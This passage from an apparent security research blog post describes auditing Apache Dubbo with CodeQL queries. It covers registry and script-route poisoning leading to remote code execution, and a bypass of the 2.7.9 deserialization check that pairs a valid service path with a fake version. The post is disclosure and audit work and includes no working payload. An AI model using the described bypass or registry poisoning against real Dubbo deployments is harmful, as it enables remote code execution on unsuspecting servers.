
This interface looks very interesting since it represents a configuration center listener. The ConfigChangedEvent will contain the contents of that change. This means that if an attacker can add or modify certain configurations or routes in the registry, then all the consumers will parse those changes and will potentially trigger an unsafe deserialization that could be used to compromise all the different consumers.

I’ll verify this by writing a simple query to check where these ConfigChangedEvents are instantiated:

import java

from ClassInstanceExpr call
where call.getConstructedType().getName() = "ConfigChangedEvent"
select call

The query returns a list of the following classes:

These classes are listeners that listen for changes in different configuration centers and are abstracted by the ConfigurationListener interface.

If an attacker can access any of these registries or configuration centers, they will be able to inject malicious YAML content that when passed to Dubbo consumers and providers will trigger arbitrary code execution. You might think that accessing these configuration managers isn’t possible, but the truth is that most of them run with no authentication/authorization enabled by default, and in some cases it may be possible to bypass, as I showed previously.

Using this approach, I found that it was indeed possible to achieve RCE by performing:

RCE on customers via script route poisoning (Nashorn script injection) (GHSL-2021-042)

pokemon

You may be wondering if this newly identified attack surface (configuration manager listeners) introduces other injection issues. You could either model all the configuration manager client libraries (Apache Curator, Nacos, etc) or just model the Dubbo abstraction layer for all of them. Turns out that all the different listeners are derived from the ConfigurationListener or the NotifyListener. You can use this info to create a source representing this attack surface with CodeQL:

import java
import semmle.code.java.dataflow.FlowSources

class NotifyListener extends RefType {
  NotifyListener() {
    this.hasQualifiedName("org.apache.dubbo.registry", "NotifyListener")
  }
}

class ConfigurationListener extends RefType {
  ConfigurationListener() {
    this.hasQualifiedName("org.apache.dubbo.common.config.configcenter", "ConfigurationListener")
  }
}

class ConfigurationListenerProcessMethod extends Method {
  ConfigurationListenerProcessMethod() {
    this.getName() = "process" and
    this.getDeclaringType().getASupertype*() instanceof ConfigurationListener
  }
}

class NotifyListenerNotifyMethod extends Method {
  NotifyListenerNotifyMethod() {
    this.getName() = "notify" and
    this.getDeclaringType().getASupertype*() instanceof NotifyListener
  }
}

class DubboListener extends RemoteFlowSource {
  DubboListener() {
    (exists(NotifyListenerNotifyMethod m |
        this.asParameter() = m.getAParameter()
      ) or
      exists(ConfigurationListenerProcessMethod m |
        this.asParameter() = m.getAParameter()
      )) and
      not this.getLocation().getFile().getAbsolutePath().matches("%/src/test/%")
  }
  override string getSourceType() { result = "Dubbo Listener Source" }
}

from DubboListener l
select
  l,
  l.asParameter().getCallable(),
  l.asParameter().getCallable().getDeclaringType()

The above query gets us the following new entry points:

new CC entrypoints

Running a complete CodeQL scan with this new source returns brand new results, including an unsafe server-side JavaScript evaluation in ScriptRouter:

Script injection

Consulting the documentation reveals that routing rules can be scripted with any of the scripting languages available in the JDK. Similar to what I showed you for the YAML deserialization, an attacker with access to a non-authenticated registry can register a new scripted route that all consumers will download and evaluate:

exploit

Master @threedr3am already wrote about exploiting my finding, so I won’t provide more details here. After all, this blog post is about the discovery process, not the exploitation one.

Review of CVE-2021-25641 mitigations

After reporting all the previous vulnerabilities to the Apache Dubbo and Apache Security teams, I was notified about the fixes implemented in v2.7.9. I was not given the opportunity to review the fix before it was released, so once I learned that it was out, I took a look at the remediation approach the Dubbo team had chosen.

To reject the processing of untrusted data that tries to set a serialization type that is different from the one explicitly enabled by the server (as in GHSL-2021-035), Apache Dubbo 2.7.9 implemented the following main mitigations:

  1. There is a new CodecSupport.getSerialization(url) method that, instead of merely forbidding a switch to native Java serialization, only uses the server-side specified serialization format and does not allow any changes.
  2. All security checks that prevented the use of the native Java protocol in CodecSupport.getSerialization(url, id) were removed and partly moved into CodecSupport.checkSerialization(path, version, serializationType).
  3. Additionally, there is an InputStream length validation in CodecSupport.decodeEventData, but nowhere else.

Two new properties control the new security checks: serialization.security.check and deserialization.event.size.

If you remember, CodecSupport.getSerialization(url, id) was the main reason I was discarding some results before. Every deserialization operation on a Serialization instance returned by that method was guaranteed to use the server-side specified serialization protocol, which would normally be Hessian. Removing that check from CodecSupport.getSerialization(url, id) means that I need to reevaluate my previous findings. Specifically, I want to know if there are any deserialization operations going through the now unsafe getSerialization(url, id) overload but not through any serialization.security.check controls.

From a design standpoint, I would think that enforcing the security check within the method returning the serializer is a more secure approach than splitting it into a new method since developers may forget to explicitly invoke the security check. This looks like yet another great question to ask my CodeQL oracle.

Let’s highlight the main difference between versions lower than v2.7.9 and v2.7.9 itself:

getSerialization

In versions lower than 2.7.9, any call to CodecSupport.deserialize() or to Serialization.deserialize() on a Serialization instance returned by CodecSupport.getSerialization(URL, id) will check that the consumer/attacker is not changing the serialization format to any dangerous Java native serialization format. Therefore, Dubbo is not enforcing the use of the provider-defined format, but neither can you arbitrarily change it to the Java format.

getSerialization overload

In 2.7.9, things are a little bit different. There is a new CodecSupport.getSerialization(URL) overload that enforces the use of the provider-defined serialization format. This will normally be Hessian, which can be configured securely. However, the old CodecSupport.getSerialization(URL, id) overload has been stripped of all security checks. Even worse, the CodecSupport.deserialize() method uses the unsafe overload.
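
To make the difference between the two overloads concrete, here is a minimal Java sketch. It is not Dubbo's code: the class, the method names, the numeric ids and the "serialization" parameter key are all placeholders I made up for illustration. It only models the two lookup styles: one that ignores what the peer asks for, and one that trusts the id read from the wire.

```java
import java.util.Map;

// Hypothetical, simplified model of the two lookup styles; not Dubbo's actual code.
final class SerializationLookupSketch {
    // Placeholder ids, assumed for illustration only.
    static final byte HESSIAN2_ID = 2;
    static final byte NATIVE_JAVA_ID = 7;

    static final Map<Byte, String> REGISTERED = Map.of(
            HESSIAN2_ID, "hessian2",
            NATIVE_JAVA_ID, "nativejava");

    /** Style 1: ignore the wire id and always use what the provider configured. */
    static String byProviderConfig(Map<String, String> providerUrlParams) {
        return providerUrlParams.getOrDefault("serialization", "hessian2");
    }

    /** Style 2: trust the id taken from the message header, with no further checks. */
    static String byWireId(byte idFromHeader) {
        String name = REGISTERED.get(idFromHeader);
        if (name == null) {
            throw new IllegalArgumentException("unknown serialization id " + idFromHeader);
        }
        return name;
    }

    public static void main(String[] args) {
        Map<String, String> provider = Map.of("serialization", "hessian2");
        System.out.println("provider-defined: " + byProviderConfig(provider));
        // The sender picks the format here, which is what makes this style risky.
        System.out.println("wire-defined:     " + byWireId(NATIVE_JAVA_ID));
    }
}
```

With the second style, any safety has to come from a separate check that every caller must remember to invoke.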

On the other hand, a new CodecSupport.checkSerialization() method was added to carry out the security checks:

checkSerialization method

I’m going to re-evaluate the query from GHSL-2021-036 but will add a sanitizer to treat checks for the new serialization.security.check and deserialization.event.size properties as cleansing nodes. Note that deserialization.event.size with the default size (50 bytes) may still allow for denial-of-service (DoS) attacks.

/**
 * @kind path-problem
 */

import java
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PathGraph

class InsecureConfig extends TaintTracking::Configuration {

  InsecureConfig() { this = "InsecureConfig" }

  override predicate isSource(DataFlow::Node source) {
    exists(Method m |
        m.getName() = "decodeBody" and
        m.getDeclaringType()
            .hasQualifiedName("org.apache.dubbo.rpc.protocol.dubbo", "DubboCodec") and
        m.getParameter(1) = source.asParameter()
     )
  }

  override predicate isAdditionalTaintStep(DataFlow::Node n1, DataFlow::Node n2) {
    exists(MethodAccess ma |
      ma.getMethod().getName() = "deserialize" and
      ma.getMethod()
          .getDeclaringType()
          .hasQualifiedName("org.apache.dubbo.common.serialize", "Serialization") and
        ma.getArgument(1) = n1.asExpr() and
        ma = n2.asExpr()
    )
  }

  override predicate isSanitizer(DataFlow::Node node) {
    exists(MethodAccess ma |
        ma.getMethod().getName() = ["getBoolean", "getInt"] and
        ma.getAnArgument().(CompileTimeConstantExpr).getStringValue() = ["serialization.security.check", "deserialization.event.size"] and
        ma.getAnEnclosingStmt().getBasicBlock().bbDominates(node.asExpr().getBasicBlock())
    )
  }

  override predicate isSink(DataFlow::Node sink) {
    exists(MethodAccess ma |
        ma.getMethod().getName().matches("read%") and
        ma.getMethod()
            .getDeclaringType()
            .getASourceSupertype*()
            .hasQualifiedName("org.apache.dubbo.common.serialize", "ObjectInput") and
        ma.getQualifier() = sink.asExpr()
    )
  }
}

from InsecureConfig conf, DataFlow::PathNode source, DataFlow::PathNode sink
where conf.hasFlowPath(source, sink)
select sink, source, sink, ""

This query is the same as the GHSL-2021-036 one, but with a new sanitizer predicate added to the dataflow configuration:

  override predicate isSanitizer(DataFlow::Node node) {
    exists(MethodAccess ma |
        ma.getMethod().getName() = ["getBoolean", "getInt"] and
        ma.getAnArgument().(CompileTimeConstantExpr).getStringValue().regexpMatch("serialization.security.check|deserialization.event.size") and
        ma.getAnEnclosingStmt().getBasicBlock().bbDominates(node.asExpr().getBasicBlock())
    )
  }

The new query returns no results, meaning that all variants found in GHSL-2021-036 are now behind checks for these new properties. This kind of query is useful when added to the CI/CD pipeline, so you can verify that new PRs don’t introduce new vulnerabilities by deserializing untrusted data on paths not guarded by these checks. The next step would be to review those checks and see if they can be bypassed.

Pre-auth unsafe Java deserialization (bypass of checkSerialization control) (GHSL-2021-097)

If I ask the oracle for all the places where these properties are used:

import java

from MethodAccess ma
where ma.getAnArgument().(CompileTimeConstantExpr).getStringValue() = ["serialization.security.check", "deserialization.event.size"]
select ma

you can see that there are three places where these checks are enforced:

DecodeableRpcResult.decode

DecodeableRpcResult.decode method

If SERIALIZATION_SECURITY_CHECK_KEY is enabled, the serialization type of the response is forced to match the one recorded in the invocation. Previously, in GHSL-2021-036, I was able to force the server to process a response even when there was no corresponding invocation (request). The invocation was null in that case, but that was fine because I could reach the deserialization sinks before triggering a NullPointerException (NPE). With this check enabled, however, I’ll get an NPE in invocation.get(SERIALIZATION_ID_KEY) and will no longer be able to send “unexpected” results. This check therefore effectively protects all the GHSL-2021-036 variants flowing through DecodeableRpcResult.
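
The effect of that NPE can be sketched in a few lines of Java. This is a simplified model under my own assumptions, not the DecodeableRpcResult code: the invocation is reduced to a plain Map, the "serialization_id" key is a made-up stand-in for SERIALIZATION_ID_KEY, and the method name is hypothetical.

```java
import java.util.HashMap;
import java.util.Map;

// Hypothetical model of a response-side check; not the actual DecodeableRpcResult code.
final class ResponseCheckSketch {
    static final String ASSUMED_ID_KEY = "serialization_id"; // stand-in for SERIALIZATION_ID_KEY

    /** Returns true if decoding may proceed; throws when the check cannot be satisfied. */
    static boolean mayDecode(Map<String, Object> invocation, byte responseId, boolean checkEnabled) {
        if (checkEnabled) {
            // A response with no matching request has invocation == null,
            // so this line throws a NullPointerException before any deserialization.
            Object expected = invocation.get(ASSUMED_ID_KEY);
            if (!Byte.valueOf(responseId).equals(expected)) {
                throw new IllegalStateException("unexpected serialization id " + responseId);
            }
        }
        return true; // the deserialization sinks would be reached after this point
    }

    public static void main(String[] args) {
        Map<String, Object> invocation = new HashMap<>();
        invocation.put(ASSUMED_ID_KEY, (byte) 2);
        System.out.println("matching response: " + mayDecode(invocation, (byte) 2, true));
        try {
            mayDecode(null, (byte) 2, true);
        } catch (NullPointerException e) {
            System.out.println("unsolicited response stopped by NPE");
        }
    }
}
```

Note that the protection in this model is a side effect of the null dereference rather than an explicit rejection, which is why it disappears as soon as the check is switched off.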

ExchangeCodec.decodeEventData

ExchangeCodec.decodeEventData method

This check guarantees that the serialization payload is smaller than 50 bytes. Even though there may be DoS payloads that fit within this size, enabling JEP 290 should account for them. Therefore, as long as users don’t change this value to something larger than 250 bytes, this check will effectively protect all the GHSL-2021-036 variants flowing through decodeEventData.
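
A size guard of this kind can be sketched as follows. This is a minimal illustration, not the decodeEventData implementation: the class and method names and the exception message are made up, and the limit of 50 is simply the default mentioned above.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;

// Hypothetical model of a payload-size guard; names and messages are invented.
final class EventSizeCheckSketch {
    static final int ASSUMED_DEFAULT_LIMIT = 50; // the default size mentioned in the text

    /** Rejects the stream before any deserializer touches it if too many bytes remain. */
    static void requireSmallPayload(InputStream in, int limit) throws IOException {
        int remaining = in.available();
        if (remaining > limit) {
            throw new IllegalArgumentException(
                    "event payload of " + remaining + " bytes exceeds limit of " + limit);
        }
    }

    public static void main(String[] args) throws IOException {
        requireSmallPayload(new ByteArrayInputStream(new byte[10]), ASSUMED_DEFAULT_LIMIT);
        System.out.println("10-byte payload accepted");
        try {
            requireSmallPayload(new ByteArrayInputStream(new byte[4096]), ASSUMED_DEFAULT_LIMIT);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The sketch relies on available(), which is exact for an in-memory ByteArrayInputStream but only an estimate for arbitrary streams, so a real guard needs to know how its input is buffered.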

DecodeableRpcInvocation.decode

DecodeableRpcInvocation.decode method

The bulk of this check is handled by CodecSupport.checkSerialization():

checkSerialization method

As you can see in the first screenshot, this method is called with a service path and version provided by the attacker (String path = in.readUTF() and String version = in.readUTF() respectively), which are then used to extract information about the service and the method being accessed (ProviderModel providerModel = repository.lookupExportedServiceWithoutGroup(path + ":" + version);). The goal of this check is to retrieve the server-side defined serialization type. However, if an attacker provides a non-existent path/version pair, the lookupExportedServiceWithoutGroup() call returns a null provider model, which makes the application take the logger.warn branch and just log a warning. No exception is thrown, and therefore the request continues to execute normally!

mitigation bypass

Even if I’m able to bypass the checkSerialization control, before I get to the interesting ObjectInput.readObject() in line 155 that deserializes the arguments to the remote method invocation, the repository.lookupService(path) method will check that I’m accessing a valid service in line 136. If I provide an invalid path to bypass the checkSerialization control then I’ll make the lookupService() call in line 136 return a null value which, in turn, will not get the pts variable assigned, and line 146 will throw an exception that will prevent the deserialization of the invocation arguments—or will it?

There is a slight but important difference between the lookupService(path) method used here and the lookupExportedServiceWithoutGroup(path + ":" + version) method used within checkSerialization. The former only looks up a service by its path, while the latter looks up a service by its path and version. Therefore, an attacker can provide a valid service path together with a non-existent version.

These values will cause lookupExportedServiceWithoutGroup() to fail, allowing the attacker to bypass the checkSerialization() security control. But the lookupService() call will succeed and therefore the attacker will be able to reach the vulnerable code.
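
The mismatch between the two lookups is easy to reproduce in isolation. The following Java sketch is a simplified model under my own assumptions, not Dubbo's code: the service name, the version, the numeric ids and the method bodies are placeholders, and only the two lookup keys (path:version versus path alone) mirror what is described above.

```java
import java.util.Map;

// Hypothetical model of the two lookups; not Dubbo's actual repository code.
final class LookupMismatchSketch {
    static final byte CONFIGURED_ID = 2; // placeholder for the provider-defined format
    static final byte ATTACKER_ID = 7;   // placeholder for the format the attacker wants

    // Keyed by "path:version", as in the security check.
    static final Map<String, Byte> EXPORTED =
            Map.of("org.example.DemoService:1.0.0", CONFIGURED_ID);
    // Keyed by path only, as in the later service lookup.
    static final Map<String, String> SERVICES =
            Map.of("org.example.DemoService", "DemoService descriptor");

    static void checkSerialization(String path, String version, byte id) {
        Byte expected = EXPORTED.get(path + ":" + version);
        if (expected == null) {
            System.err.println("WARN: no provider model for " + path + ":" + version);
            return; // warning only, the request is not rejected
        }
        if (expected != id) {
            throw new IllegalStateException("unexpected serialization id " + id);
        }
    }

    static boolean decodeReachesReadObject(String path, String version, byte id) {
        checkSerialization(path, version, id);
        if (SERVICES.get(path) == null) {
            throw new IllegalArgumentException("service not found: " + path);
        }
        return true; // the argument deserialization would happen here
    }

    public static void main(String[] args) {
        // Valid path, bogus version: the check only warns and the lookup by path succeeds.
        System.out.println(decodeReachesReadObject("org.example.DemoService", "9.9.9", ATTACKER_ID));
    }
}
```

In this model, the same request sent with the real version "1.0.0" is rejected by the check, and a request with an unknown path is rejected by the second lookup. Only the valid-path, invalid-version combination slips through both.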

Conclusion

CodeQL is commonly used to detect known vulnerability patterns and their associated variants in code. CodeQL queries are usually written to find very specific vulnerabilities for variant analysis purposes and are often integrated into CI/CD pipelines to automatically detect bugs. However, CodeQL can also serve as an interactive SAST Swiss army knife to support more general code auditing workflows. Since CodeQL makes a program’s AST and dataflows queryable, it can effectively answer many of the general questions that commonly arise when auditing code, such as: Which APIs are tainted by user-controlled input? Which integer arithmetic may be influenced by network-controlled data? Which parts of the code have a high bug density?

By using CodeQL as an audit oracle, I was able to focus my audit efforts on critical and sensitive parts of the application and speed up my audit by providing quick and complete answers for any inquiry I could have. Not just that, while I was analyzing other issues, I was able to stumble upon new “smelly” parts of the code that led to new findings just by looking at what was pointed out by CodeQL. In addition, features such as the reverse partial data flow proved very useful to hoist known sinks and to help me understand how those sinks could be exercised. CodeQL is an auditor’s best friend.

Stay secure!